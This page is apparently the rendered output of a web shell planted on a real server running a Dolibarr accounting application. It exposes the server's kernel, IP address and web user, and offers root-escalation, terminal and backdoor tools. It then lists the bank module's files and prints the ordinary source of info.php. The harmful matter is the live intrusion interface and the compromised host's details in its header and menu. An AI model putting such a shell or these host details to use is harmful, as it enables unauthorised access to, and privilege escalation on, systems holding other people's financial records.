Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.35
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
html /
bdc.bdcloud.fr /
compta /
bank /
Delete
Unzip
Name
Size
Permission
Date
Action
class
[ DIR ]
drwxr-x---
2025-11-08 11:17
various_payment
[ DIR ]
drwxr-x---
2025-11-08 11:17
account_statement_document.php
7.1
KB
-rwxr-x---
2023-04-04 15:52
annuel.php
15.09
KB
-rwxr-x---
2023-04-04 15:52
bankentries_list.php
71.69
KB
-rwxr-x---
2023-04-04 15:52
bilan.php
2.7
KB
-rwxr-x---
2023-04-04 15:52
budget.php
3.5
KB
-rwxr-x---
2023-04-04 15:52
card.php
42.77
KB
-rwxr-x---
2023-04-04 15:52
categ.php
5.39
KB
-rwxr-x---
2023-04-04 15:52
document.php
4.76
KB
-rwxr-x---
2023-04-04 15:52
graph.php
26.64
KB
-rwxr-x---
2023-04-04 15:52
info.php
2.58
KB
-rwxr-x---
2023-04-04 15:52
line.php
26.75
KB
-rwxr-x---
2023-04-04 15:52
list.php
30.65
KB
-rwxr-x---
2023-04-04 15:52
releve.php
26.63
KB
-rwxr-x---
2023-04-04 15:52
transfer.php
10.14
KB
-rwxr-x---
2023-04-04 15:52
treso.php
14.17
KB
-rwxr-x---
2023-04-04 15:52
Save
Rename
<?php /* Copyright (C) 2005-2010 Laurent Destailleur <eldy@users.sourceforge.net> * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see <https://www.gnu.org/licenses/>. */ /** * \file htdocs/compta/bank/info.php * \ingroup compta/bank * \brief Info tab of bank statement */ // Load Dolibarr environment require '../../main.inc.php'; require_once DOL_DOCUMENT_ROOT.'/core/lib/functions2.lib.php'; require_once DOL_DOCUMENT_ROOT.'/compta/bank/class/account.class.php'; require_once DOL_DOCUMENT_ROOT.'/compta/paiement/class/paiement.class.php'; // Load translation files required by the page $langs->loadLangs(array('banks', 'categories', 'companies')); // Get Parameters $id = GETPOST("rowid", 'int'); $accountid = (GETPOST('id', 'int') ? GETPOST('id', 'int') : GETPOST('account', 'int')); $ref = GETPOST('ref', 'alpha'); // Security check $fieldvalue = (!empty($id) ? $id : (!empty($ref) ? $ref : '')); $fieldtype = (!empty($ref) ? 'ref' : 'rowid'); if ($user->socid) { $socid = $user->socid; } $result = restrictedArea($user, 'banque', $accountid, 'bank_account'); if (empty($user->rights->banque->lire) && empty($user->rights->banque->consolidate)) { accessforbidden(); } /* * View */ llxHeader(); $object = new AccountLine($db); $object->fetch($id); $object->info($id); $h = 0; $head[$h][0] = DOL_URL_ROOT.'/compta/bank/line.php?rowid='.$id; $head[$h][1] = $langs->trans("BankTransaction"); $h++; $head[$h][0] = DOL_URL_ROOT.'/compta/bank/info.php?rowid='.$id; $head[$h][1] = $langs->trans("Info"); $hselected = $h; $h++; print dol_get_fiche_head($head, $hselected, $langs->trans("LineRecord"), -1, 'accountline'); $linkback = '<a href="'.DOL_URL_ROOT.'/compta/bank/bankentries_list.php?restore_lastsearch_values=1">'.$langs->trans("BackToList").'</a>'; dol_banner_tab($object, 'rowid', $linkback); print '<div class="underbanner clearboth"></div>'; print '<br>'; print '<table width="100%"><tr><td>'; dol_print_object_info($object); print '</td></tr></table>'; print '</div>'; // End of page llxFooter(); $db->close();